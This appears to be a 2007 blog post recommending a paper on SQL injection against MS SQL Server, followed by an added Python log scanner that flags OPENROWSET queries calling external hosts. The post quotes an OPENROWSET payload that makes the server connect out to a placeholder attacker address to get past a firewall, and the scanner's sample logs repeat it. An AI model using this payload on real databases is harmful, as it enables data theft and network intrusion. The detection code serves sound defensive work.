Bending MS SQL Server and Greasing It Up
I just read a great article published by Application Security Inc., which gave me some good ideas for my future SQL Injection attacks. It starts like this:
select * from OPENROWSET('SQLoledb', 'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;', 'select * from table')
Well, having the SQL server call home to your machine is cool enough (bye bye firewall), but the paper's author, Cesar Cerrudo, went a step further. These are the main topics covered by his paper:
- Detection of SQL injection vulnerabilities
- Retrieving results from SQL injection
- Elevating privileges
- Uploading files
- Getting into the internal network
- Port scanning
- Recommendations
I highly recommend "Manipulating Microsoft SQL Server Using SQL Injection".
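A defender's view of the call-home query above, as an added example that is not from this post or from Cerrudo's paper: it scans request or SQL log lines for OPENROWSET/OPENDATASOURCE calls whose provider string names a network address, and flags destinations outside the internal ranges. The log lines, the internal ranges and the function names are constructed assumptions, and only the keyword=value provider-string form shown above is parsed.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Ad hoc remote-data call; group 2 is the provider string (second argument).
ADHOC = re.compile(
    r"\b(openrowset|opendatasource)\s*\(\s*'[^']*'\s*,\s*'([^']*)'", re.I)

# Assumption: these ranges count as "internal"; adjust to your own network.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def parse_provider_string(s):
    """Turn 'k=v;k=v;' into a dict with lower-cased keys."""
    pairs = (item.split("=", 1) for item in s.split(";") if "=" in item)
    return {k.strip().lower(): v.strip() for k, v in pairs}

def is_internal(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname is not proven internal, so it gets flagged
    return any(ip in net for net in INTERNAL)

def inspect(line):
    """Return one finding per ad hoc call that names a network address."""
    findings = []
    for m in ADHOC.finditer(unquote_plus(line)):  # undo %27 and '+' encoding
        props = parse_provider_string(m.group(2))
        addr = props.get("address") or props.get("data source")
        if not addr:
            continue
        host, _, port = addr.partition(",")  # DBMSSOCN form is "host,port"
        findings.append({
            "function": m.group(1).upper(),
            "host": host.strip(),
            "port": int(port) if port.strip().isdigit() else None,
            "blank_password": props.get("pwd") == "",
            "external": not is_internal(host.strip()),
        })
    return findings

# Constructed sample lines (203.0.113.10 is a documentation address).
SAMPLE_LOG = [
    "GET /item.asp?id=1 HTTP/1.1",
    "GET /item.asp?id=1;select+*+from+OPENROWSET(%27SQLoledb%27,%27uid=sa;pwd=;"
    "Network=DBMSSOCN;Address=203.0.113.10,80;%27,%27select+*+from+table%27) HTTP/1.1",
    "GET /report.asp?q=select * from openrowset('SQLoledb',"
    "'uid=app;pwd=x;Network=DBMSSOCN;Address=10.0.0.5,1433;','select 1')",
]
```

A finding with `external` set is the case the post calls "bye bye firewall": the database server itself opens the outbound connection, so egress filtering on the SQL Server host is the control that matters.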
This entry was posted on Sunday, March 4th, 2007.



